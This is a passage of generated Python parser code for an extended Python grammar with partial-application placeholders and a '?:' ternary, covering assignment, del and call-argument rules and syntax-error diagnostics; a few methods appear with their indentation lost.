        start_lineno, start_col_offset = tok.start
        if (
            (invalid_kwarg := self.invalid_kwarg())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (a := self.name())
            and
            (literal := self.expect('='))
            and
            (b := self._tmp_141())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . keyword ( arg = a . string , value = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.partial_starred_expression())
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def partial_kwarg_or_double_starred(self) -> Optional[Any]:
        # partial_kwarg_or_double_starred: invalid_kwarg | NAME '=' (partial_placeholder | expression) | '**' (partial_placeholder | expression)
        """Parse ``name=value`` or ``**value`` in a partial call.

        ``**value`` becomes an ``ast.keyword`` with ``arg=None`` (the AST
        encoding of dict unpacking).  Returns ``None`` when no alternative
        matches; ``invalid_kwarg`` is tried only for error reporting.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (invalid_kwarg := self.invalid_kwarg())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (a := self.name())
            and
            (literal := self.expect('='))
            and
            (b := self._tmp_142())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . keyword ( arg = a . string , value = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('**'))
            and
            (a := self._tmp_143())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . keyword ( arg = None , value = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
@memoize
def partial_placeholder(self) -> Optional[Any]:
# partial_placeholder: '?'
mark = self._mark()
if (
(literal := self.expect('?'))
):
return "?"
self._reset(mark)
return None
    @memoize
    def star_targets(self) -> Optional[Any]:
        # star_targets: star_target !',' | star_target ((',' star_target))* ','?
        """Parse one or more assignment targets.

        A single target with no following comma is returned as-is; a
        comma-separated sequence becomes an ``ast.Tuple`` in Store context.
        Returns ``None`` if no target is found.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.star_target())
            and
            self.negative_lookahead(self.expect, ',')
        ):
            return a
        self._reset(mark)
        if (
            (a := self.star_target())
            and
            (b := self._loop0_144(),)
            and
            (opt := self.expect(','),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Tuple ( elts = [a] + b , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def star_targets_list_seq(self) -> Optional[list]:
        # star_targets_list_seq: ','.star_target+ ','?
        """Parse the comma-separated targets inside a list display target.

        Returns the list of target nodes (trailing comma allowed), or ``None``.
        """
        mark = self._mark()
        if (
            (a := self._gather_145())
            and
            (opt := self.expect(','),)
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def star_targets_tuple_seq(self) -> Optional[list]:
        # star_targets_tuple_seq: star_target ((',' star_target))+ ','? | star_target ','
        """Parse the targets of a parenthesized tuple target.

        Requires at least one comma (what distinguishes a tuple from a
        parenthesized single target).  Returns the list of target nodes,
        or ``None``.
        """
        mark = self._mark()
        if (
            (a := self.star_target())
            and
            (b := self._loop1_147())
            and
            (opt := self.expect(','),)
        ):
            return [a] + b
        self._reset(mark)
        if (
            (a := self.star_target())
            and
            (literal := self.expect(','))
        ):
            return [a]
        self._reset(mark)
        return None
    @memoize
    def star_target(self) -> Optional[Any]:
        # star_target: '*' (!'*' star_target) | target_with_star_atom
        """Parse a single assignment target, possibly starred.

        ``*target`` becomes an ``ast.Starred`` whose inner target is forced
        into Store context via ``set_expr_context``; otherwise delegates to
        ``target_with_star_atom``.  Returns ``None`` on no match.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('*'))
            and
            (a := self._tmp_148())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Starred ( value = self . set_expr_context ( a , Store ) , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (target_with_star_atom := self.target_with_star_atom())
        ):
            return target_with_star_atom
        self._reset(mark)
        return None
    @memoize
    def target_with_star_atom(self) -> Optional[Any]:
        # target_with_star_atom: t_primary '.' NAME !t_lookahead | t_primary '[' slices ']' !t_lookahead | star_atom
        """Parse an attribute/subscript assignment target, or a star atom.

        The ``!t_lookahead`` negative lookahead ensures the attribute or
        subscript is the *end* of a primary chain (no further ``.``/``[``/``(``
        follows), so it is a valid Store target.  Returns an ``ast.Attribute``
        or ``ast.Subscript`` in Store context, the ``star_atom`` result, or
        ``None``.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.t_primary())
            and
            (literal := self.expect('.'))
            and
            (b := self.name())
            and
            self.negative_lookahead(self.t_lookahead, )
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Attribute ( value = a , attr = b . string , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.t_primary())
            and
            (literal := self.expect('['))
            and
            (b := self.slices())
            and
            (literal_1 := self.expect(']'))
            and
            self.negative_lookahead(self.t_lookahead, )
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Subscript ( value = a , slice = b , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (star_atom := self.star_atom())
        ):
            return star_atom
        self._reset(mark)
        return None
    @memoize
    def star_atom(self) -> Optional[Any]:
        # star_atom: NAME | '(' target_with_star_atom ')' | '(' star_targets_tuple_seq? ')' | '[' star_targets_list_seq? ']'
        """Parse an atomic assignment target.

        Produces an ``ast.Name``, a parenthesized target re-contexted to
        Store, an ``ast.Tuple``, or an ``ast.List`` — all in Store context.
        Returns ``None`` on no match.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.name())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Name ( id = a . string , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('('))
            and
            (a := self.target_with_star_atom())
            and
            (literal_1 := self.expect(')'))
        ):
            return self . set_expr_context ( a , Store )
        self._reset(mark)
        if (
            (literal := self.expect('('))
            and
            (a := self.star_targets_tuple_seq(),)
            and
            (literal_1 := self.expect(')'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Tuple ( elts = a , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('['))
            and
            (a := self.star_targets_list_seq(),)
            and
            (literal_1 := self.expect(']'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . List ( elts = a , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def single_target(self) -> Optional[Any]:
        # single_target: single_subscript_attribute_target | NAME | '(' single_target ')'
        """Parse a single (non-tuple) assignment target.

        Used where exactly one target is legal (e.g. annotated assignment).
        Returns an attribute/subscript target, an ``ast.Name`` in Store
        context, a parenthesized single target, or ``None``.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (single_subscript_attribute_target := self.single_subscript_attribute_target())
        ):
            return single_subscript_attribute_target
        self._reset(mark)
        if (
            (a := self.name())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Name ( id = a . string , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('('))
            and
            (a := self.single_target())
            and
            (literal_1 := self.expect(')'))
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def single_subscript_attribute_target(self) -> Optional[Any]:
        # single_subscript_attribute_target: t_primary '.' NAME !t_lookahead | t_primary '[' slices ']' !t_lookahead
        """Parse a lone attribute or subscript assignment target.

        Same structure as ``target_with_star_atom`` minus the star-atom
        fallback; the negative ``t_lookahead`` guarantees the chain ends
        here.  Returns an ``ast.Attribute``/``ast.Subscript`` in Store
        context, or ``None``.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.t_primary())
            and
            (literal := self.expect('.'))
            and
            (b := self.name())
            and
            self.negative_lookahead(self.t_lookahead, )
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Attribute ( value = a , attr = b . string , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.t_primary())
            and
            (literal := self.expect('['))
            and
            (b := self.slices())
            and
            (literal_1 := self.expect(']'))
            and
            self.negative_lookahead(self.t_lookahead, )
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Subscript ( value = a , slice = b , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize_left_rec
    def t_primary(self) -> Optional[Any]:
        # t_primary: t_primary '.' NAME &t_lookahead | t_primary '[' slices ']' &t_lookahead | t_primary genexp &t_lookahead | t_primary '(' arguments? ')' &t_lookahead | t_primary '(' partial_arguments ')' &t_lookahead | atom &t_lookahead
        """Parse the primary chain that may prefix an assignment target.

        Left-recursive (handled by ``@memoize_left_rec``): builds up
        attribute access, subscription, generator-expression calls, plain
        calls, and partial-application calls, each guarded by a *positive*
        ``t_lookahead`` — i.e. the chain only extends while another
        ``.``/``[``/``(`` follows.  All nodes are built in Load context.
        Returns the accumulated expression or ``None``.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.t_primary())
            and
            (literal := self.expect('.'))
            and
            (b := self.name())
            and
            self.positive_lookahead(self.t_lookahead, )
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Attribute ( value = a , attr = b . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.t_primary())
            and
            (literal := self.expect('['))
            and
            (b := self.slices())
            and
            (literal_1 := self.expect(']'))
            and
            self.positive_lookahead(self.t_lookahead, )
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Subscript ( value = a , slice = b , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.t_primary())
            and
            (b := self.genexp())
            and
            self.positive_lookahead(self.t_lookahead, )
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Call ( func = a , args = [b] , keywords = [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.t_primary())
            and
            (literal := self.expect('('))
            and
            (b := self.arguments(),)
            and
            (literal_1 := self.expect(')'))
            and
            self.positive_lookahead(self.t_lookahead, )
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Call ( func = a , args = b [0] if b else [] , keywords = b [1] if b else [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
        self._reset(mark)
        if (
            (a := self.t_primary())
            and
            (literal := self.expect('('))
            and
            (b := self.partial_arguments())
            and
            (literal_1 := self.expect(')'))
            and
            self.positive_lookahead(self.t_lookahead, )
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return self . make_partial_function ( a , b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.atom())
            and
            self.positive_lookahead(self.t_lookahead, )
        ):
            return a
        self._reset(mark)
        return None
@memoize
def t_lookahead(self) -> Optional[Any]:
# t_lookahead: '(' | '[' | '.'
mark = self._mark()
if (
(literal := self.expect('('))
):
return literal
self._reset(mark)
if (
(literal := self.expect('['))
):
return literal
self._reset(mark)
if (
(literal := self.expect('.'))
):
return literal
self._reset(mark)
return None
    @memoize
    def del_targets(self) -> Optional[Any]:
        # del_targets: ','.del_target+ ','?
        """Parse the comma-separated targets of a ``del`` statement.

        Returns the list of target nodes (trailing comma allowed), or ``None``.
        """
        mark = self._mark()
        if (
            (a := self._gather_149())
            and
            (opt := self.expect(','),)
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def del_target(self) -> Optional[Any]:
        # del_target: t_primary '.' NAME !t_lookahead | t_primary '[' slices ']' !t_lookahead | del_t_atom
        """Parse a single ``del`` target.

        Mirrors ``target_with_star_atom`` but builds nodes in Del context.
        Returns an ``ast.Attribute``/``ast.Subscript``, the ``del_t_atom``
        result, or ``None``.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.t_primary())
            and
            (literal := self.expect('.'))
            and
            (b := self.name())
            and
            self.negative_lookahead(self.t_lookahead, )
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Attribute ( value = a , attr = b . string , ctx = Del , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.t_primary())
            and
            (literal := self.expect('['))
            and
            (b := self.slices())
            and
            (literal_1 := self.expect(']'))
            and
            self.negative_lookahead(self.t_lookahead, )
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Subscript ( value = a , slice = b , ctx = Del , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (del_t_atom := self.del_t_atom())
        ):
            return del_t_atom
        self._reset(mark)
        return None
    @memoize
    def del_t_atom(self) -> Optional[Any]:
        # del_t_atom: NAME | '(' del_target ')' | '(' del_targets? ')' | '[' del_targets? ']'
        """Parse an atomic ``del`` target.

        Produces an ``ast.Name``, a re-contexted parenthesized target, an
        ``ast.Tuple``, or an ``ast.List`` — all in Del context.  Returns
        ``None`` on no match.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.name())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Name ( id = a . string , ctx = Del , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('('))
            and
            (a := self.del_target())
            and
            (literal_1 := self.expect(')'))
        ):
            return self . set_expr_context ( a , Del )
        self._reset(mark)
        if (
            (literal := self.expect('('))
            and
            (a := self.del_targets(),)
            and
            (literal_1 := self.expect(')'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Tuple ( elts = a , ctx = Del , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('['))
            and
            (a := self.del_targets(),)
            and
            (literal_1 := self.expect(']'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . List ( elts = a , ctx = Del , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def type_expressions(self) -> Optional[list]:
        # type_expressions: ','.expression+ ',' '*' expression ',' '**' expression | ','.expression+ ',' '*' expression | ','.expression+ ',' '**' expression | '*' expression ',' '**' expression | '*' expression | '**' expression | ','.expression+
        """Parse the expression list of a function type comment.

        Accepts plain expressions optionally followed by ``*expr`` and/or
        ``**expr``; the star markers themselves are dropped and only the
        expressions are returned as a flat list.  Alternatives are ordered
        longest-first so the greediest match wins.  Returns ``None`` on no
        match.
        """
        mark = self._mark()
        if (
            (a := self._gather_151())
            and
            (literal := self.expect(','))
            and
            (literal_1 := self.expect('*'))
            and
            (b := self.expression())
            and
            (literal_2 := self.expect(','))
            and
            (literal_3 := self.expect('**'))
            and
            (c := self.expression())
        ):
            return a + [b , c]
        self._reset(mark)
        if (
            (a := self._gather_153())
            and
            (literal := self.expect(','))
            and
            (literal_1 := self.expect('*'))
            and
            (b := self.expression())
        ):
            return a + [b]
        self._reset(mark)
        if (
            (a := self._gather_155())
            and
            (literal := self.expect(','))
            and
            (literal_1 := self.expect('**'))
            and
            (b := self.expression())
        ):
            return a + [b]
        self._reset(mark)
        if (
            (literal := self.expect('*'))
            and
            (a := self.expression())
            and
            (literal_1 := self.expect(','))
            and
            (literal_2 := self.expect('**'))
            and
            (b := self.expression())
        ):
            return [a , b]
        self._reset(mark)
        if (
            (literal := self.expect('*'))
            and
            (a := self.expression())
        ):
            return [a]
        self._reset(mark)
        if (
            (literal := self.expect('**'))
            and
            (a := self.expression())
        ):
            return [a]
        self._reset(mark)
        if (
            (a := self._gather_157())
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def func_type_comment(self) -> Optional[Any]:
        # func_type_comment: NEWLINE TYPE_COMMENT &(NEWLINE INDENT) | invalid_double_type_comments | TYPE_COMMENT
        """Parse an optional function-signature type comment.

        The first alternative matches a type comment on its own line just
        before the indented body (lookahead, not consumed) and returns its
        text; the bare TYPE_COMMENT alternative returns the token itself.
        ``invalid_double_type_comments`` exists only to raise a clearer
        error.  Returns ``None`` when absent.
        """
        mark = self._mark()
        if (
            (_newline := self.expect('NEWLINE'))
            and
            (t := self.type_comment())
            and
            self.positive_lookahead(self._tmp_159, )
        ):
            return t . string
        self._reset(mark)
        if (
            (invalid_double_type_comments := self.invalid_double_type_comments())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (type_comment := self.type_comment())
        ):
            return type_comment
        self._reset(mark)
        return None
    @memoize
    def invalid_arguments(self) -> Optional[NoReturn]:
        # invalid_arguments: args ',' '*' | expression for_if_clauses ',' [args | expression for_if_clauses] | NAME '=' expression for_if_clauses | args for_if_clauses | args ',' expression for_if_clauses | args ',' args
        """Diagnose malformed call argument lists.

        Each alternative recognizes a specific mistake (unpacking order,
        unparenthesized generator expression, ``=`` where ``==``/``:=`` was
        meant, positional-after-keyword) and stores a targeted syntax error
        via the ``store_syntax_error_*`` helpers.  Never yields a parse
        result.
        """
        mark = self._mark()
        if (
            (a := self.args())
            and
            (literal := self.expect(','))
            and
            (literal_1 := self.expect('*'))
        ):
            return self . store_syntax_error_known_location ( "iterable argument unpacking follows keyword argument unpacking" , a [1] [- 1] if a [1] else a [0] [- 1] , )
        self._reset(mark)
        if (
            (a := self.expression())
            and
            (b := self.for_if_clauses())
            and
            (literal := self.expect(','))
            and
            (opt := self._tmp_160(),)
        ):
            return self . store_syntax_error_known_range ( "Generator expression must be parenthesized" , a , b [- 1] . target )
        self._reset(mark)
        if (
            (a := self.name())
            and
            (b := self.expect('='))
            and
            (expression := self.expression())
            and
            (for_if_clauses := self.for_if_clauses())
        ):
            return self . store_syntax_error_known_range ( "invalid syntax. Maybe you meant '==' or ':=' instead of '='?" , a , b )
        self._reset(mark)
        if (
            (a := self.args())
            and
            (for_if_clauses := self.for_if_clauses())
        ):
            return self . store_syntax_error_starting_from ( "Generator expression must be parenthesized" , a [1] [- 1] if a [1] else a [0] [- 1] )
        self._reset(mark)
        if (
            (args := self.args())
            and
            (literal := self.expect(','))
            and
            (a := self.expression())
            and
            (b := self.for_if_clauses())
        ):
            return self . store_syntax_error_known_range ( "Generator expression must be parenthesized" , a , b [- 1] . target , )
        self._reset(mark)
        if (
            (a := self.args())
            and
            (literal := self.expect(','))
            and
            (args := self.args())
        ):
            return self . store_syntax_error ( "positional argument follows keyword argument unpacking" if a [1] [- 1] . arg is None else "positional argument follows keyword argument" , )
        self._reset(mark)
        return None
    @memoize
    def invalid_kwarg(self) -> Optional[NoReturn]:
        # invalid_kwarg: NAME '=' expression for_if_clauses | !(NAME '=') expression '='
        """Diagnose a bad ``=`` inside a call argument.

        Covers ``name=expr for ...`` (generator after keyword) and
        ``expr =`` where the left side is not a bare name; both store a
        descriptive syntax error.  Never yields a parse result.
        """
        mark = self._mark()
        if (
            (a := self.name())
            and
            (b := self.expect('='))
            and
            (expression := self.expression())
            and
            (for_if_clauses := self.for_if_clauses())
        ):
            return self . store_syntax_error_known_range ( "invalid syntax. Maybe you meant '==' or ':=' instead of '='?" , a , b )
        self._reset(mark)
        if (
            self.negative_lookahead(self._tmp_161, )
            and
            (a := self.expression())
            and
            (b := self.expect('='))
        ):
            return self . store_syntax_error_known_range ( "expression cannot contain assignment, perhaps you meant \"==\"?" , a , b , )
        self._reset(mark)
        return None
    @memoize
    def expression_without_invalid(self) -> Optional[ast . AST]:
        # expression_without_invalid: disjunction 'if' disjunction 'else' expression | disjunction '?' disjunction ':' expression | disjunction | lambdef
        """Parse an expression without trying the ``invalid_*`` error rules.

        Supports both the standard ``a if cond else b`` conditional and the
        C-style ``cond ? a : b`` extension; note the operand roles differ
        between the two forms (in ``?:`` the first disjunction is the test).
        Returns an AST node or ``None``.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.disjunction())
            and
            (literal := self.expect('if'))
            and
            (b := self.disjunction())
            and
            (literal_1 := self.expect('else'))
            and
            (c := self.expression())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . IfExp ( body = b , test = a , orelse = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (b := self.disjunction())
            and
            (literal := self.expect('?'))
            and
            (a := self.disjunction())
            and
            (literal_1 := self.expect(':'))
            and
            (c := self.expression())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . IfExp ( body = a , test = b , orelse = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (disjunction := self.disjunction())
        ):
            return disjunction
        self._reset(mark)
        if (
            (lambdef := self.lambdef())
        ):
            return lambdef
        self._reset(mark)
        return None
    @memoize
    def invalid_legacy_expression(self) -> Optional[Any]:
        # invalid_legacy_expression: NAME !'(' expression_without_invalid
        """Diagnose Python-2-style ``print x`` / ``exec x`` statements.

        Raises a "Missing parentheses" syntax error only when the leading
        name is ``exec`` or ``print``; any other name yields ``None`` so
        normal parsing continues.
        """
        mark = self._mark()
        if (
            (a := self.name())
            and
            self.negative_lookahead(self.expect, '(')
            and
            (b := self.expression_without_invalid())
        ):
            return self . raise_syntax_error_known_range ( f"Missing parentheses in call to '{a.string}' . Did you mean {a.string}(...)?" , a , b , ) if a . string in ( "exec" , "print" ) else None
        self._reset(mark)
        return None
    @memoize
    def invalid_expression(self) -> Optional[NoReturn]:
        # invalid_expression: invalid_legacy_expression | !(NAME STRING | SOFT_KEYWORD) disjunction expression_without_invalid | disjunction 'if' disjunction !('else' | ':') | disjunction '?' !'?' disjunction !':'
        """Diagnose common malformed expressions.

        Detects legacy ``print``/``exec`` calls, two adjacent expressions
        (likely a missing comma), an ``if`` conditional without ``else``,
        and a ``?`` ternary without its ``:``; each stores a targeted
        syntax error.  Never yields a parse result.
        """
        mark = self._mark()
        if (
            (invalid_legacy_expression := self.invalid_legacy_expression())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            self.negative_lookahead(self._tmp_162, )
            and
            (a := self.disjunction())
            and
            (b := self.expression_without_invalid())
        ):
            return self . store_syntax_error_known_range ( "invalid syntax. Perhaps you forgot a comma?" , a , b )
        self._reset(mark)
        if (
            (a := self.disjunction())
            and
            (literal := self.expect('if'))
            and
            (b := self.disjunction())
            and
            self.negative_lookahead(self._tmp_163, )
        ):
            return self . store_syntax_error_known_range ( "expected 'else' after 'if' expression" , a , b )
        self._reset(mark)
        if (
            (b := self.disjunction())
            and
            (literal := self.expect('?'))
            and
            self.negative_lookahead(self.expect, '?')
            and
            (a := self.disjunction())
            and
            self.negative_lookahead(self.expect, ':')
        ):
            return self . store_syntax_error_known_range ( "expected ':' after '?' expression" , b , a )
        self._reset(mark)
        return None
    @memoize
    def invalid_named_expression(self) -> Optional[NoReturn]:
        # invalid_named_expression: expression ':=' expression | NAME '=' bitwise_or !('=' | ':=') | !(list | tuple | genexp | 'True' | 'None' | 'False') bitwise_or '=' bitwise_or !('=' | ':=')
        """Diagnose bad walrus/assignment use inside an expression.

        The last two alternatives suppress the error while inside a
        recursive (left-recursion) re-parse — ``in_recursive_rule`` — to
        avoid reporting spurious errors during backtracking.  Never yields
        a parse result.
        """
        mark = self._mark()
        if (
            (a := self.expression())
            and
            (literal := self.expect(':='))
            and
            (expression := self.expression())
        ):
            return self . store_syntax_error_known_location ( f"cannot use assignment expressions with {self.get_expr_name(a)}" , a )
        self._reset(mark)
        if (
            (a := self.name())
            and
            (literal := self.expect('='))
            and
            (b := self.bitwise_or())
            and
            self.negative_lookahead(self._tmp_164, )
        ):
            return ( None if self . in_recursive_rule else self . store_syntax_error_known_range ( "invalid syntax. Maybe you meant '==' or ':=' instead of '='?" , a , b ) )
        self._reset(mark)
        if (
            self.negative_lookahead(self._tmp_165, )
            and
            (a := self.bitwise_or())
            and
            (b := self.expect('='))
            and
            (bitwise_or := self.bitwise_or())
            and
            self.negative_lookahead(self._tmp_166, )
        ):
            return ( None if self . in_recursive_rule else self . store_syntax_error_known_range ( f"cannot assign to {self.get_expr_name(a)} here. Maybe you meant '==' instead of '='?" , a , b ) )
        self._reset(mark)
        return None
    @memoize
    def invalid_assignment(self) -> Optional[NoReturn]:
        # invalid_assignment: invalid_ann_assign_target ':' expression | star_named_expression ',' star_named_expressions* ':' expression | expression ':' expression | ((star_targets '='))* star_expressions '=' | ((star_targets '='))* yield_expr '=' | star_expressions augassign (yield_expr | star_expressions)
        """Diagnose invalid assignment statements.

        Covers annotating a non-single target, annotating an illegal
        expression, assigning to a non-target, assigning to a yield
        expression, and augmented assignment to an illegal target; each
        stores a targeted syntax error.  Never yields a parse result.
        """
        mark = self._mark()
        if (
            (a := self.invalid_ann_assign_target())
            and
            (literal := self.expect(':'))
            and
            (expression := self.expression())
        ):
            return self . store_syntax_error_known_location ( f"only single target (not {self.get_expr_name(a)}) can be annotated" , a )
        self._reset(mark)
        if (
            (a := self.star_named_expression())
            and
            (literal := self.expect(','))
            and
            (_loop0_167 := self._loop0_167(),)
            and
            (literal_1 := self.expect(':'))
            and
            (expression := self.expression())
        ):
            return self . store_syntax_error_known_location ( "only single target (not tuple) can be annotated" , a )
        self._reset(mark)
        if (
            (a := self.expression())
            and
            (literal := self.expect(':'))
            and
            (expression := self.expression())
        ):
            return self . store_syntax_error_known_location ( "illegal target for annotation" , a )
        self._reset(mark)
        if (
            (_loop0_168 := self._loop0_168(),)
            and
            (a := self.star_expressions())
            and
            (literal := self.expect('='))
        ):
            return self . store_syntax_error_known_location ( f"cannot assign to {self.get_expr_name(a)}" , a )
        self._reset(mark)
        if (
            (_loop0_169 := self._loop0_169(),)
            and
            (a := self.yield_expr())
            and
            (literal := self.expect('='))
        ):
            return self . store_syntax_error_known_location ( "assignment to yield expression not possible" , a )
        self._reset(mark)
        if (
            (a := self.star_expressions())
            and
            (augassign := self.augassign())
            and
            (_tmp_170 := self._tmp_170())
        ):
            return self . store_syntax_error_known_location ( f"{self.get_expr_name(a)} is an illegal expression for augmented assignment" , a )
        self._reset(mark)
        return None
    @memoize
    def invalid_ann_assign_target(self) -> Optional[ast . AST]:
        # invalid_ann_assign_target: list | tuple | '(' invalid_ann_assign_target ')'
        """Match a target that is illegal for an annotated assignment.

        Returns the offending list/tuple node (possibly parenthesized) so
        the caller can report its location, or ``None``.
        """
        mark = self._mark()
        if (
            (a := self.list())
        ):
            return a
        self._reset(mark)
        if (
            (a := self.tuple())
        ):
            return a
        self._reset(mark)
        if (
            (literal := self.expect('('))
            and
            (a := self.invalid_ann_assign_target())
            and
            (literal_1 := self.expect(')'))
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def invalid_del_stmt(self) -> Optional[NoReturn]:
        # invalid_del_stmt: 'del' star_expressions
        """Diagnose ``del`` applied to a non-deletable expression.

        Only reached after the valid ``del`` rule fails; raises immediately
        (``raise_``, not ``store_``) with the expression's friendly name.
        """
        mark = self._mark()
        if (
            (literal := self.expect('del'))
            and
